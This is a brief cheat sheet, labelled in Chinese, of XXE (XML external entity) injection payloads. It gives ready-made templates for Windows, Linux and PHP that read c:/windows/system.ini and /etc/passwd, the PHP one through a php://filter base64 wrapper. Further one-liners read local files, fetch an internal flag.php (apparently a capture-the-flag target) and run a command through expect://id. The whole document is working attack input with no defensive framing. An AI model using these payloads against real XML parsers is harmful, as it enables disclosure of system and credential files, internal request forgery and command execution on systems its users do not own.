windows模板
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///c:/windows/system.ini">]>
<something>&test;</something>

linux模板
<!DOCTYPE a[
<!ENTITY test SYSTEM "file:///etc/passwd">]>
<something>&test;</something>

php模板
<!DOCTYPE a[
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">]>
<something>&test;</something>

读文件:file:///etc/passwd
读网页:http://127.0.0.1/flag.php
执行命令:expect://id